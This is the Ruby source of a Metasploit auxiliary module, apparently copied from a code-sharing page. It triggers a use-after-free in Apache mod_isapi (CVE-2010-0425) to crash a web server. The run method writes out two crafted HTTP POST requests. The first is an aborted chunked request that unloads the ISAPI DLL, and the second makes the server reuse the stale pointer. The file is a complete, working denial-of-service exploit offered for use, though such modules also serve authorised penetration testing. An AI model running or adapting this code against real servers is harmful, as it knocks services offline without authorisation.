Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'Apache mod_isapi Dangling Pointer',
13
      'Description'    => %q{
14
        This module triggers a use-after-free vulnerability in the Apache
15
        Software Foundation mod_isapi extension for versions 2.2.14 and earlier.
16
        In order to reach the vulnerable code, the target server must have an
17
        ISAPI module installed and configured.
18

19
        By making a request that terminates abnormally (either an aborted TCP
20
        connection or an unsatisfied chunked request), mod_isapi will unload the
21
        ISAPI extension. Later, if another request comes for that ISAPI module,
22
        previously obtained pointers will be used resulting in an access
23
        violation or potentially arbitrary code execution.
24

25
        Although arbitrary code execution is theoretically possible, a
26
        real-world method of invoking this consequence has not been proven. In
27
        order to do so, one would need to find a situation where a particular
28
        ISAPI module loads at an image base address that can be re-allocated by
29
        a remote attacker.
30

31
        Limited success was encountered using two separate ISAPI modules. In
32
        this scenario, a second ISAPI module was loaded into the same memory
33
        area as the previously unloaded module.
34
      },
35
      'Author'         =>
36
        [
37
          'Brett Gervasoni',  # original discovery
38
          'jduck'
39
        ],
40
      'License'        => MSF_LICENSE,
41
      'References'     =>
42
        [
43
          [ 'CVE', '2010-0425' ],
44
          [ 'OSVDB', '62674'],
45
          [ 'BID', '38494' ],
46
          [ 'URL', 'https://bz.apache.org/bugzilla/show_bug.cgi?id=48509' ],
47
          [ 'URL', 'https://web.archive.org/web/20100715032229/http://www.gossamer-threads.com/lists/apache/cvs/381537' ],
48
          [ 'URL', 'http://www.senseofsecurity.com.au/advisories/SOS-10-002' ],
49
          [ 'EDB', '11650' ]
50
        ],
51
      'DisclosureDate' => '2010-03-05'))
52

53
    register_options([
54
      Opt::RPORT(80),
55
      OptString.new('ISAPI', [ true, 'ISAPI URI to request', '/cgi-bin/SMTPSend.dll' ])
56
    ])
57
  end
58

59
  def run
60

61
    serverIP = datastore['RHOST']
62
    if (datastore['RPORT'].to_i != 80)
63
      serverIP += ":" + datastore['RPORT'].to_s
64
    end
65
    isapiURI = datastore['ISAPI']
66

67
    # Create a stale pointer using the vulnerability
68
    print_status("Causing the ISAPI dll to be loaded and unloaded...")
69
    unload_trigger = "POST " + isapiURI + " HTTP/1.0\r\n" +
70
      "Pragma: no-cache\r\n" +
71
      "Proxy-Connection: Keep-Alive\r\n" +
72
      "Host: " + serverIP + "\r\n" +
73
      "Transfer-Encoding: chunked\r\n" +
74
      "Content-Length: 40334\r\n\r\n" +
75
      Rex::Text.rand_text_alphanumeric(rand(128)+128)
76
    connect
77
    sock.put(unload_trigger)
78
    disconnect
79

80
    # Now make the stale pointer get used...
81
    print_status("Triggering the crash ...")
82
    data = Rex::Text.rand_text_alphanumeric(rand(256)+1337)
83
    crash_trigger = "POST " + isapiURI + " HTTP/1.0\r\n" +
84
      "Host: " + serverIP + "\r\n" +
85
      "Content-Length: #{data.length}\r\n\r\n" +
86
      data
87

88
    connect
89
    sock.put(crash_trigger)
90
    disconnect
91

92
  end
93
end
94

95